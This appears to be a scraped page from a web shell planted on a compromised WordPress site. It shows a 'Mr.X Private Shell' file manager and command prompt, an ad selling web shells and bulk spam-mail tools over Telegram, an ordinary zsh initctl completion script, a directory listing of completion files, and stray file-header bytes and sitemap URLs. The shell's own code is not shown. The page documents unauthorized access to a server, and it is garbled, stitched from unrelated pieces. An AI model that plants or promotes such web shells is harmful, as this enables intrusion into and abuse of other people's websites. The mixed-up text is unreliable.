xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#compdef initctl start stop restart reload status
# Written by Bernhard Tittelbach
# based on completion script by Mildred

typeset -g -a -U _initctl_events_list _initctl_eventargs_list

# run show-config -e and if possible parse out all events and KEY= argumnts
# otherwise provide some common values
_initctl_fillarray_events_args ()
{
  setopt extendedglob
  local showconfig="$(initctl show-config -e 2>| /dev/null)"
  if [[ -n "$showconfig" ]]; then
    _initctl_events_list=()
    _initctl_eventargs_list=()
    for cline in "${(f)showconfig}"; do
      if [[ "$cline" == (#s)\ \ (stop\ on|start\ on|emit)\ (#b)([[:alpha:]-_]##)(*)(#e) ]]; then
        _initctl_events_list+=($match[1])
        # this is a bit tricky, we take the string right of the matched event
        # and parse for \sUPPERCASE=\S (in perl-re syntax) substrings until there are no more matches
        # since we can't do multiple matches, we concatenated the remaing strings and try again
        local stml="$match[2]"
        while [[ "$stml" == (#b)(*)\ ([[:upper:]_]##\=)[^[:space:]](#b)(*) ]]; do
          _initctl_eventargs_list+=($match[2])
          stml="$match[1] $match[3]"
        done
        unset stml
      fi
    done
  else
    _initctl_events_list=( socket login-session-start desktop-session-start virtual-filesystems local-filesystems remote-filesystems all-swaps filesystem mounting mounted net-device-up start-portmap runlevel unmounted-remote-filesystems )
    _initctl_eventargs_list=( PRIMARY_DEVICE_FOR_DISPLAY= EXIT_STATUS= EXIT_SIGNAL= RUNLEVEL= MOUNTPOINT= TYPE= INTERFACE= )
  fi
  return 0
}

# list all upstart jobs, i.e. all files in /etc/init/
_initctl_helper_jobs()
{
    _path_files -W "/etc/init/" -g "*.conf(-.:r)"
}

# list events, generate array if necessary
_initctl_known_events()
{
  [[ ${#_initctl_events_list} -eq 0 ]] && _initctl_fillarray_events_args
  _values "Event" "$_initctl_events_list[@]"
}

# list events, allow multiple choices, generate array if necessary
_initctl_multiple_known_events()
{
  [[ ${#_initctl_events_list} -eq 0 ]] && _initctl_fillarray_events_args
  _values -s "," "Events" "$_initctl_events_list[@]"
}

# list KEY= arguments, generate array if necessary
_initctl_known_eventargs()
{
  [[ ${#_initctl_eventargs_list} -eq 0 ]] && _initctl_fillarray_events_args
  _values "Argument Keys" "$_initctl_eventargs_list[@]"
}

# describe and offer commands for initctl, then call matching completion function
_initctl_command()
{
    local cmds
    cmds=(
        start:"Start jobs"
        stop:"Stop jobs"
        restart:"Restart jobs"
        reload:"Send SIGHUP to process instance"
        status:"Query status of jobs"
        list:"List known jobs"
        emit:"Emit an event"
        reload-configuration:"tell init to reload config files (generally inotify is used)"
        version:"Request the version of the init daemon"
        log-priority:"Change the minimum priority of log messages from the init daemon"
        show-config:"Show start/stop/emit for processes"
        check-config:"Find jobs than can't be started"
        help:"display list of commands"
    )

    if (( CURRENT == 1 )); then
        _describe -t command "initctl Commands" cmds
    fi

    local cmd=$words[1]

    local curcontext="${curcontext%:*}:initctl-${cmd}"
    _call_function ret _initctl_${cmd_completion_funcs[${cmd}]-${cmd_completion_default}}
}

# completion for start/stop/restart/reload i.e. anything that take one job and multiple KEY= arguments's
_initctl_startstop()
{
    _arguments \
        '--no-wait[do not wait for operation to complete before exiting]' \
        "${common_args[@]}" \
        ':Upstart Jobs:_initctl_helper_jobs' \
        '*::Argument Keys:_initctl_known_eventargs'
}

# completion for anything that takes one job
_initctl_argjob()
{
    _arguments \
        "${common_args[@]}" \
        ':Upstart Jobs:_initctl_helper_jobs' \
        '*::'
}

# completion for emit, providing options,  one event and multiple KEY= arguments's
_initctl_emit()
{
    _arguments \
        '--no-wait[do not wait for event to finish before exiting]' \
        "${common_args[@]}" \
        ':Events:_initctl_known_events' \
        '*::Argument Keys:_initctl_known_eventargs'
}

# the fallback, just the options
_initctl_basic()
{
    _arguments \
        "${common_args[@]}"
}

# completion for show-config, additional option and one job
_initctl_show-config()
{
    _arguments \
      "(-e --enumerate)"{-e,--enumerate}"[enumerate emit lines]" \
        "${common_args[@]}" \
        '::Upstart Jobs:_initctl_helper_jobs' \
        '*::'
}

# completion for show-config, additional options and one job
_initctl_check-config()
{
    _arguments \
      "(-i --ignore-events)"{-i,--ignore-events}"[list of comma-separated events to ignore]:Events:_initctl_multiple_known_events" \
      "(-w --warn)"{-w,--warn}"[treat any unknown jobs or events as error]" \
        "${common_args[@]}" \
        '::Upstart Jobs:_initctl_helper_jobs' \
        '*::'
}

# after defining above functions, overwrite _initctl function so helper-functions are loaded only once
_initctl()
{
  local -a common_args
  common_args=(
    '--session[use D-Bus session bus to connect to init daemon (for testing)]'
    '--system[talk via DBUS system bus instead of socket]'
    '(-q --quiet)'{-q,--quiet}'[reduce output to errors only]'
    '(-v --verbose)'{-v,--verbose}'[increase output to include informational messages]'
    '--dest=[D-Bus name for init, defaults to com.ubuntu.Upstart]'
    '--help[display help and exit]'
    '--version[output version information and exit]'
  )

  # map each initctl function to a completion function
  local -A cmd_completion_funcs
  cmd_completion_funcs=( start startstop stop startstop restart startstop reload startstop show-config show-config status argjob emit emit check-config check-config )

  # define fallback completion function
  local cmd_completion_default=basic

  # depending on which command was used, call different completion funtions
  case $service in
    initctl)
      _arguments "${common_args[@]}" '*::Initctl Commands:_initctl_command'
    ;;
    start|stop|restart|reload|status)
      _call_function ret _initctl_${cmd_completion_funcs[${service}]-${cmd_completion_default}}
    ;;
    *)  return 1  ;;
  esac
}

_initctl "$@"

Filemanager

Name Type Size Permission Actions
_a2ps File 2.74 KB 0644
_aap File 2.58 KB 0644
_adb File 15.02 KB 0644
_ant File 5.96 KB 0644
_antiword File 1.08 KB 0644
_apachectl File 116 B 0644
_apm File 1.64 KB 0644
_arch_archives File 413 B 0644
_arch_namespace File 3.23 KB 0644
_arp File 1.14 KB 0644
_arping File 1.32 KB 0644
_at File 969 B 0644
_attr File 2.24 KB 0644
_awk File 975 B 0644
_baz File 15.64 KB 0644
_bind_addresses File 416 B 0644
_bison File 923 B 0644
_bittorrent File 4.8 KB 0644
_bogofilter File 5.17 KB 0644
_bzip2 File 2.17 KB 0644
_bzr File 10.53 KB 0644
_cal File 547 B 0644
_calendar File 1.37 KB 0644
_canonical_paths File 4.1 KB 0644
_cat File 1.41 KB 0644
_ccal File 778 B 0644
_cdcd File 2.09 KB 0644
_cdrdao File 8.06 KB 0644
_cdrecord File 4.75 KB 0644
_chkconfig File 777 B 0644
_chmod File 2.22 KB 0644
_chown File 2.48 KB 0644
_clay File 1.72 KB 0644
_comm File 409 B 0644
_compress File 1.38 KB 0644
_configure File 444 B 0644
_cowsay File 535 B 0644
_cp File 3.56 KB 0644
_cpio File 4.55 KB 0644
_cplay File 343 B 0644
_cssh File 795 B 0644
_ctags_tags File 170 B 0644
_cut File 2.3 KB 0644
_cvs File 28.27 KB 0644
_darcs File 1.17 KB 0644
_date File 1.11 KB 0644
_dbus File 3.46 KB 0644
_dd File 812 B 0644
_devtodo File 4.53 KB 0644
_df File 2.95 KB 0644
_dhclient File 925 B 0644
_dict File 2.09 KB 0644
_dict_words File 1.26 KB 0644
_diff File 90 B 0644
_diff_options File 6.98 KB 0644
_diffstat File 727 B 0644
_dir_list File 680 B 0644
_directories File 117 B 0644
_django File 5.86 KB 0644
_dmidecode File 935 B 0644
_domains File 585 B 0644
_du File 4.06 KB 0644
_dvi File 3.94 KB 0644
_ecasound File 8.38 KB 0644
_elinks File 2.89 KB 0644
_elm File 653 B 0644
_email_addresses File 5.32 KB 0644
_enscript File 5.24 KB 0644
_env File 429 B 0644
_espeak File 2.03 KB 0644
_etags File 2.08 KB 0644
_fakeroot File 486 B 0644
_feh File 6.85 KB 0644
_fetchmail File 554 B 0644
_ffmpeg File 8.16 KB 0644
_figlet File 1.47 KB 0644
_file_systems File 1.14 KB 0644
_files File 3.93 KB 0644
_find File 3 KB 0644
_finger File 2.11 KB 0644
_flasher File 1.62 KB 0644
_flex File 1.42 KB 0644
_fortune File 601 B 0644
_fsh File 519 B 0644
_fuser File 2.06 KB 0644
_gcc File 11.81 KB 0644
_gdb File 1.68 KB 0644
_genisoimage File 1.96 KB 0644
_getconf File 2.16 KB 0644
_getent File 1.61 KB 0644
_getfacl File 1.34 KB 0644
_getmail File 1.05 KB 0644
_git File 282.06 KB 0644
_global File 1.81 KB 0644
_global_tags File 186 B 0644
_gnu_generic File 178 B 0644
_gnupod File 5.57 KB 0644
_gnutls File 6.1 KB 0644
_go File 256 B 0644
_gpg File 12.99 KB 0644
_gphoto2 File 2.45 KB 0644
_gprof File 1.31 KB 0644
_gradle File 6.82 KB 0644
_graphicsmagick File 28.2 KB 0644
_grep File 3.98 KB 0644
_groff File 2.2 KB 0644
_groups File 1009 B 0644
_growisofs File 19.16 KB 0644
_gs File 1.58 KB 0644
_guilt File 1.52 KB 0644
_gzip File 3.52 KB 0644
_have_glob_qual File 910 B 0644
_hg File 29.08 KB 0644
_hosts File 2.63 KB 0644
_iconv File 2.55 KB 0644
_id File 453 B 0644
_ifconfig File 2.8 KB 0644
_iftop File 665 B 0644
_imagemagick File 27.45 KB 0644
_init_d File 2.55 KB 0644
_initctl File 6.18 KB 0644
_ip File 19.66 KB 0644
_irssi File 1.38 KB 0644
_ispell File 4.11 KB 0644
_java File 22.96 KB 0644
_java_class File 693 B 0644
_joe File 2.22 KB 0644
_join File 933 B 0644
_killall File 365 B 0644
_knock File 304 B 0644
_kvno File 566 B 0644
_last File 472 B 0644
_ld_debug File 1.14 KB 0644
_ldd File 1.3 KB 0644
_less File 5.54 KB 0644
_lha File 1.77 KB 0644
_links File 2.04 KB 0644
_list_files File 1.39 KB 0644
_ln File 2.96 KB 0644
_loadkeys File 595 B 0644
_locales File 349 B 0644
_locate File 4.5 KB 0644
_look File 444 B 0644
_lp File 8.08 KB 0644
_ls File 5.94 KB 0644
_lsof File 2.32 KB 0644
_lynx File 10.9 KB 0644
_lzop File 3.75 KB 0644
_mail File 432 B 0644
_mailboxes File 5.88 KB 0644
_make File 8.43 KB 0644
_man File 3.25 KB 0644
_md5sum File 457 B 0644
_mencal File 1.06 KB 0644
_metaflac File 1.42 KB 0644
_mh File 3.51 KB 0644
_mime_types File 1.13 KB 0644
_mkdir File 1.86 KB 0644
_module File 5.37 KB 0644
_monotone File 2.45 KB 0644
_mosh File 372 B 0644
_mount File 40.42 KB 0644
_mpc File 6.46 KB 0644
_mt File 3.14 KB 0644
_mtools File 3.99 KB 0644
_mtr File 725 B 0644
_mutt File 1.28 KB 0644
_my_accounts File 45 B 0644
_mysql_utils File 9.75 KB 0644
_mysqldiff File 1.1 KB 0644
_ncftp File 280 B 0644
_net_interfaces File 1.03 KB 0644
_netcat File 1.29 KB 0644
_newsgroups File 210 B 0644
_nice File 246 B 0644
_nkf File 2.1 KB 0644
_nm File 731 B 0644
_nmap File 3.38 KB 0644
_notmuch File 1.63 KB 0644
_npm File 529 B 0644
_nslookup File 5.54 KB 0644
_other_accounts File 64 B 0644
_pack File 361 B 0644
_patch File 7.95 KB 0644
_path_commands File 2.77 KB 0644
_path_files File 26.93 KB 0644
_pax File 2.72 KB 0644
_pbm File 25.25 KB 0644
_pdf File 423 B 0644
_perforce File 86.14 KB 0644
_perl File 5.21 KB 0644
_perl_basepods File 716 B 0644
_perl_modules File 4.56 KB 0644
_perldoc File 2.28 KB 0644
_pgrep File 2.09 KB 0644
_php File 2.99 KB 0644
_pids File 1.59 KB 0644
_pine File 2.88 KB 0644
_ping File 1.69 KB 0644
_pkg-config File 2.11 KB 0644
_pkg_instance File 353 B 0644
_pkgadd File 1012 B 0644
_pkginfo File 613 B 0644
_pkgrm File 551 B 0644
_pon File 443 B 0644
_ports File 285 B 0644
_postfix File 530 B 0644
_postscript File 333 B 0644
_prcs File 6.69 KB 0644
_printenv File 104 B 0644
_printers File 3.13 KB 0644
_prove File 2.25 KB 0644
_ps1234 File 3.34 KB 0644
_pspdf File 341 B 0644
_psutils File 3.69 KB 0644
_pump File 1.41 KB 0644
_pydoc File 436 B 0644
_python File 2.03 KB 0644
_qemu File 2.49 KB 0644
_quilt File 9.81 KB 0644
_raggle File 2.68 KB 0644
_rake File 2.78 KB 0644
_ranlib File 403 B 0644
_rar File 4.51 KB 0644
_rcs File 766 B 0644
_remote_files File 2.47 KB 0644
_renice File 424 B 0644
_ri File 3.72 KB 0644
_rlogin File 1.81 KB 0644
_rm File 1.53 KB 0644
_rrdtool File 491 B 0644
_rsync File 12.41 KB 0644
_rubber File 2.64 KB 0644
_ruby File 2.84 KB 0644
_sablotron File 1.77 KB 0644
_samba File 3.36 KB 0644
_sccs File 6.04 KB 0644
_screen File 6.6 KB 0644
_sed File 1.07 KB 0644
_service File 1.02 KB 0644
_services File 951 B 0644
_setfacl File 1.96 KB 0644
_sh File 547 B 0644
_showmount File 428 B 0644
_signals File 1013 B 0644
_sisu File 3.84 KB 0644
_slrn File 1.1 KB 0644
_socket File 1.06 KB 0644
_sort File 2.74 KB 0644
_spamassassin File 475 B 0644
_sqlite File 1.55 KB 0644
_sqsh File 2.11 KB 0644
_ssh File 21.46 KB 0644
_stgit File 952 B 0644
_strip File 2.31 KB 0644
_stty File 762 B 0644
_su File 1.9 KB 0644
_subversion File 10.19 KB 0644
_sudo File 1.13 KB 0644
_surfraw File 17.72 KB 0644
_sysctl File 1.67 KB 0644
_systemd File 16.49 KB 0644
_tar File 5.97 KB 0644
_tar_archive File 1014 B 0644
_tardy File 678 B 0644
_tcpdump File 4.2 KB 0644
_tcptraceroute File 583 B 0644
_telnet File 2.84 KB 0644
_terminals File 230 B 0644
_tex File 1.92 KB 0644
_texi File 129 B 0644
_texinfo File 8.52 KB 0644
_tidy File 7.13 KB 0644
_tiff File 7.06 KB 0644
_tilde_files File 676 B 0644
_time_zone File 222 B 0644
_tin File 2.07 KB 0644
_tla File 17.58 KB 0644
_tmux File 49.02 KB 0644
_todo.sh File 4.07 KB 0644
_toilet File 863 B 0644
_topgit File 177 B 0644
_totd File 287 B 0644
_tracepath File 87 B 0644
_tree File 1.87 KB 0644
_twidge File 1.67 KB 0644
_twisted File 1.37 KB 0644
_unace File 472 B 0644
_uname File 2.5 KB 0644
_unexpand File 620 B 0644
_uniq File 1.35 KB 0644
_unison File 5.39 KB 0644
_units File 2.75 KB 0644
_urls File 5.91 KB 0644
_user_admin File 1.9 KB 0644
_user_at_host File 729 B 0644
_users File 251 B 0644
_users_on File 253 B 0644
_uzbl File 304 B 0644
_vcsh File 2.86 KB 0644
_vim File 5.34 KB 0644
_vorbis File 5.57 KB 0644
_vorbiscomment File 617 B 0644
_vux File 1.77 KB 0644
_w3m File 4.42 KB 0644
_webbrowser File 210 B 0644
_wget File 8.08 KB 0644
_whereis File 36 B 0644
_whois File 4.71 KB 0644
_wiggle File 1.09 KB 0644
_xargs File 502 B 0644
_xmlsoft File 6.47 KB 0644
_xmms2 File 5.26 KB 0644
_xz File 4.1 KB 0644
_yafc File 1.8 KB 0644
_yodl File 658 B 0644
_yp File 3.17 KB 0644
_zcat File 99 B 0644
_zdump File 112 B 0644
_zfs File 17.83 KB 0644
_zfs_dataset File 2.56 KB 0644
_zfs_keysource_props File 408 B 0644
_zfs_pool File 51 B 0644
_zip File 5.25 KB 0644
_zpool File 8.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml